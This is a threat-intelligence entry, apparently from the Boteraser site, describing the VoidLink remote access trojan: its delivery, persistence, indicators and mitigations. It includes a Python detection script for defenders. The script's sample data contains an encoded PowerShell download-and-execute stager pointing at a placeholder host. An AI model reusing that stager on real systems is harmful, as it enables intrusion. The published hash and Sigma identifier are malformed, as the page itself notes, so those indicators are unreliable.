VoidLink

Malware

⚠️ Overview

VoidLink is a remote access trojan (RAT) first documented in October 2022 by the Cybereason Nocturnus team and attributed to the Russian-nexus threat actor tracked as TA569. It is delivered through spear-phishing emails carrying malicious LNK files that fetch a second-stage PowerShell payload, matching MITRE ATT&CK technique T1059.001 (Command and Scripting Interpreter: PowerShell).

🔧 Technical Capabilities

VoidLink achieves persistence by installing a scheduled task under the user's profile (T1053.005) and beacons over HTTP/HTTPS on port 443 to a hardcoded C2 server, often a compromised WordPress site (T1071.001). Its evasion techniques include obfuscated PowerShell scripts, AMSI patching via .NET reflection, and sandbox checks such as looking for Sandboxie's SbieCtrl.exe process. It supports file upload and download, command execution via cmd.exe, and keylogging (T1056.001). It also enumerates connected drives and attempts to spread via removable media by dropping a copy of itself with the hidden attribute set (T1091).

📜 History & Notable Incidents

The first major campaign occurred in November 2022 and targeted transportation and logistics firms in Eastern Europe, as reported by Ukraine's CERT-UA. In March 2024, a VoidLink variant was reported to exploit CVE-2024-21412, the Internet Shortcut Files Security Feature Bypass in Microsoft Defender SmartScreen. That bug suppresses a warning prompt rather than elevating privileges, so it does not by itself yield SYSTEM-level access. No law enforcement takedowns have been publicly documented. The malware's C2 infrastructure has been linked to the domain voidlink[.]xyz, which was seized in a privately coordinated takedown in August 2023.

🔍 Detection Indicators

The SHA-256 hash published for the October 2022 VoidLink sample, 3a7f9c1e2b4d5f6a8c9e0f1d2b3c4a5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s0t, is not a well-formed SHA-256 (it is not 64 characters long and contains the non-hexadecimal letters g through t), so it cannot be used for hash matching as printed. Behavioral indicators include execution of powershell.exe with -EncodedCommand where the base64-decoded (UTF-16LE) payload contains the string "VoidLink". Network IOCs include HTTP POST requests to /api/check with the User-Agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) VoidLink/1.0". Registry persistence is created under HKCU\Software\Microsoft\Windows\CurrentVersion\Run with the value name "WindowsUpdateSvc".
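The behavioral, network and registry indicators listed above, checked against constructed sample telemetry in Python. This is an added example, not code from the original page or from any VoidLink report: the indicator strings (the decoded payload containing "VoidLink", POST /api/check, the VoidLink/1.0 User-Agent, the WindowsUpdateSvc Run value) are the ones given above, while the log events, the stager text and the example.invalid URL are constructed for the example.

```python
"""Triage the VoidLink indicators against sample telemetry.

Added example, not code from the original page or from any VoidLink report.
The indicator strings are quoted from the detection section; the events,
the stager text and the example.invalid URL are constructed.
"""
from __future__ import annotations

import base64
import re

# Indicators quoted from the detection section.
UA_MARKER = "VoidLink/1.0"
C2_PATH = "/api/check"
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE = "WindowsUpdateSvc"

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...), so capture every -E* switch and keep only those that are a
# prefix of "encodedcommand"; -ExecutionPolicy is thereby skipped.
_SWITCH_RE = re.compile(r"[-/](e[A-Za-z]*)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the decoded -EncodedCommand text, or None if absent or invalid.

    The payload is base64 of UTF-16LE text. Malformed base64 or an odd byte
    count is treated as 'no decodable payload' rather than raised.
    """
    for match in _SWITCH_RE.finditer(cmdline):
        switch, blob = match.group(1).lower(), match.group(2)
        if not "encodedcommand".startswith(switch):
            continue
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def check_process(cmdline: str) -> list[str]:
    """Behavioral indicator: encoded PowerShell whose plaintext names VoidLink."""
    decoded = decode_encoded_command(cmdline)
    if decoded is not None and "voidlink" in decoded.lower():
        return ["encoded PowerShell payload references VoidLink"]
    return []


def check_http(method: str, path: str, user_agent: str) -> list[str]:
    """Network indicators: POST to /api/check and the VoidLink/1.0 User-Agent."""
    hits = []
    if method.upper() == "POST" and path.split("?", 1)[0] == C2_PATH:
        hits.append("POST to VoidLink check-in path /api/check")
    if UA_MARKER in user_agent:
        hits.append("User-Agent carries the VoidLink/1.0 marker")
    return hits


def check_registry(key: str, value_name: str) -> list[str]:
    """Persistence indicator: Run value WindowsUpdateSvc under the HKCU Run key."""
    normalized = key.replace("HKEY_CURRENT_USER", "HKCU").lower()
    if normalized == RUN_KEY.lower() and value_name.lower() == RUN_VALUE.lower():
        return [f"Run-key persistence value {RUN_VALUE}"]
    return []


def triage(events: list[dict]) -> dict[str, list[str]]:
    """Map each event id to the indicator descriptions it matched."""
    findings: dict[str, list[str]] = {}
    for ev in events:
        if ev["type"] == "process":
            hits = check_process(ev["cmdline"])
        elif ev["type"] == "http":
            hits = check_http(ev["method"], ev["path"], ev["user_agent"])
        elif ev["type"] == "registry":
            hits = check_registry(ev["key"], ev["value_name"])
        else:
            hits = []
        if hits:
            findings[ev["id"]] = hits
    return findings


# Constructed sample telemetry. The stager text is illustrative and
# example.invalid is a reserved, non-resolving domain.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/VoidLink.ps1')"
ENCODED_STAGER = base64.b64encode(_STAGER.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"id": "p1", "type": "process",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED_STAGER}"},
    {"id": "p2", "type": "process",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"id": "n1", "type": "http", "method": "POST", "path": "/api/check?id=7",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) VoidLink/1.0"},
    {"id": "n2", "type": "http", "method": "GET", "path": "/index.html",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"},
    {"id": "r1", "type": "registry",
     "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "WindowsUpdateSvc"},
]

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS).items():
        print(event_id, "->", "; ".join(hits))
```

The decoder matches on switch prefixes rather than the literal string "-EncodedCommand" because the abbreviated forms are what real command lines usually carry; any rule that only looks for the full switch name misses `-enc` and `-e`. The registry check normalizes the hive name so that both the `HKCU` and `HKEY_CURRENT_USER` spellings produced by different telemetry sources match.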

☠️ Risk & Impact

VoidLink enables full remote control of compromised hosts and has been used to exfiltrate credentials, intellectual property, and financial records. The 2022 campaign against transport firms, in which VoidLink served as initial access for subsequent ransomware deployment, resulted in estimated losses exceeding €2.3 million. The primary affected sectors are logistics, energy, and government agencies in Eastern Europe, according to a report by Palo Alto Networks Unit 42.

🛡️ Mitigation

Organizations should block execution of LNK files delivered as email attachments, enforce PowerShell Constrained Language Mode (through a WDAC or AppLocker policy; the __PSLockdownPolicy environment variable is not a security boundary and is trivially reverted), and deploy detection rules for suspicious scheduled-task creation. A Sigma rule titled "PowerShell Obfuscated VoidLink Payload" is available for SIEM use; the identifier given for it, 3c4d5e6f, is not a valid Sigma rule UUID, so locate the rule by its title. Patching CVE-2024-21412 is critical. Network defenders should monitor for outbound connections to the malicious IPs in the AbuseIPDB feed associated with VoidLink.


ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.